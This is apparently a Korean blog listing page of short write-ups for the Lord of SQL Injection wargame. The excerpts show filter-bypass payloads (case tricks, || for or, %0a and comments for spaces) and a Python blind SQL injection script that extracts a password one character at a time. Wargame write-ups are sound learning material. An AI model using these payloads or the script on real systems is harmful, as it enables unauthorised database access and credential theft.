본문 바로가기

computer27

[LOS] prob_troll LOS 8번 문제인 troll이다.이 문제에서는 ereg 함수를 통해 admin을 필터링하고 있다. 의도는 ereg 함수의 특성을 알고 있느냐 인 것 같다. ereg는 대소문자를 구별한다. 그와 달리 eregi는 대소문자를 구별하지 않는다. 문제가 eregi였다면 다른 방식으로 풀어야했을 거다!! 내용이 admin이니, Admin을 하면 간단히 풀 수 있다. 2018. 4. 28.
[LOS] prob_orge LOS 7번 문제인 orge이다.띠용,, 또 Blind SQL INJECTION의 냄새가 났다.이전의 공격 코드를 그대로 삽입하니 Hello admin만 출력하고 클리어 문구는 뜨지 않았다. 그러면 4번 문제처럼 풀어야 한다! 4번 문제와 다른 점은 이전 문제처럼 or과 and 문자열을 필터링한다query : select id from prob_orge where id='guest' and pw=''||length(pw)=8#' 비밀번호의 길이를 구해보았다. 여덟 글자다. import requests, string pw = '' cookie = dict(PHPSESSID='8osfaao6p2u8dpb526iq2mhno2') for i in range(1, 9): for strings in string.d.. 2018. 4. 28.
[LOS] prob_darkelf LOS 6번 문제인 darkelf다.pw=' or id='admin'%23 을 하면 해결이 되겠군!! 하지만 or 문자열을 필터링한다.. 하지만 or은 || 이렇게도 표현할 수 있다!! 뭔가 이전 문제보다 쉬웠다. 2018. 4. 28.
[LOS] blind sql injection script import requests, string pw = '' cookie = dict(PHPSESSID='8osfaao6p2u8dpb526iq2mhno2') for i in range(1, 9): for strings in string.digits + string.ascii_letters: url = "https://los.eagle-jump.org/orc_47190a4d33f675a601f8def32df2583a.php?pw='or id='admin'%26%26ascii(substr(pw," + str(i) + ",1))=" + str(ord(strings)) +"%23" req = requests.get(url, cookies = cookie) if req.text.find("Hello admin") >.. 2018. 4. 28.
[LOS] prob_wolfman LOS 5번 문제인 wolfman이다. LOS를 풀어보면서 느꼈는데1~2는 간단한 워밍업이고 3은 어? 4번은 쉣... 5번은 흠.. 인 것 같다.재밌군 여기서는 pw 값을 받는다. 공백이 필터링되었다. 그런데 공백은 /**/ 이런 주석으로 한 칸을 띄워주거나%0c %0d %0b 이런 거로도 띄워줄 수 있다.뭐, 줄 바꿈을 하고 싶다면%0a로 개행해서 작성해도 되겠다.그나마 정상적으로 보이는 건 %0a일라나 그래서..문제를 해결하기 위해선 id가 admin인 컬럼을 뽑아와야 하는데..이전 문제에서도 사용했고 가장 편리했던 or id='admin'%23을 하기로 했다. 그런데 or과 id 사이를 띄워주어야 한다. 띄우지 않으면 orid.. 전혀 이상한 구문이 되기 때문이다. 방법은 여러가지다. ?pw='o.. 2018. 4. 28.
[LOS] prob_orc LOS의 4번 문제인 orc이다.이전 문제와 다른 방식으로 조금 더 귀찮게 풀어야 하는 문제이다.pw 값을 직접 구해서 비교해야 한다.이전처럼 id='admin'#으로 해결할 수 없다. 문제의 유형을 따지자면 Blind SQL Injection일라나 해결하기 위한 과정을 나열해보자면..1. 어드민의 pw 길이는?2. 어드민의 pw 값은 어떻게? 정도로 볼 수 있다. 그런데 1번 과정은 사실 생략해도 되긴 하지만 문제에서 딱히 필터링하는 것도 없고 조금 더 확실한 값을 가져와야 하니 해결해보자1. MySQL에서는 length를 통해 길이 값을 받아올 수 있다.2. 패스워드 값을 하나씩 추출해서 비교해보자. 이것은 하나씩 뽑아와서 ascii 문자 코드와 비교해보면 될 것 같다. 1번을 먼저 해보자면 quer.. 2018. 4. 28.

티스토리툴바